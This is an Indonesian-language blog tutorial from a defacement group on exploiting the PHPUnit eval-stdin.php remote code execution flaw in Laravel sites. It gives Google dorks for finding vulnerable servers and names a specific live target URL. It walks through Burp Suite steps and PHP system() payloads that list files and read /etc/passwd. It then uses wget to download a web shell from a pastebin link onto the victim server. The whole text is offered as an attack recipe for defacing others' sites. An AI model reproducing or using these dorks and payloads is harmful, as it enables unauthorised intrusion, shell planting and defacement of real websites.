Tuesday, December 3, 2019

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

         Assalamualaikum Sobat IES team. Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang Laravel phpUnit UPLOAD SHELL.

       Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE)

Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite
Pertama siapkan :
- BurpSuite ( download di google banyak )
- Browser

Dorking di google :
- inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
* kembangin lagi biar dapet target lebih fresh

Exploit : /eval-stdin.php
site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
* kalau blank putih berarti vuln
Oke langsung aja, disini gua udh dapet targetnya :
http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Buka BurpSuite > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On )
Lalu kalian buka target yang tadi, dan buka BurpSuite lagi.

Jika sudah, klik kanan dan pilih Send to Repeater / Ctrl + R
Masuk ke Repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Nah sekarang saatnya mengeksekusi :v
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik " Go ".

Nanti kalo bisa di eksekusi bakal muncul responsnya disebelah kanan, lihat gambar.
Kalo gamuncul berarti gbs di eksekusi.

Langsung aja kita tusbool gan dgn perintah wget buat manggil shell kita

- <?php system('wget link shell lu -o px.php'); ?>
     atau lu bisa pake link shell gua
- <?php system('wget https://pastebin.com/raw/E5fXkdyC -o px.php'); ?>
Nb : px.php bisa ganti terserah kamu, buat namain file shell yg kita upload
Nah shell px.php gua udh ke upload, tinggal buka aja deh :*
Shell telah terupload :V


Baca juga:


Ok sekian dari kami semoga bermanfaat oh iya artikel ini di buat oleh ~./Ron7x  salah satu member IES sekarang...
Disqus Comments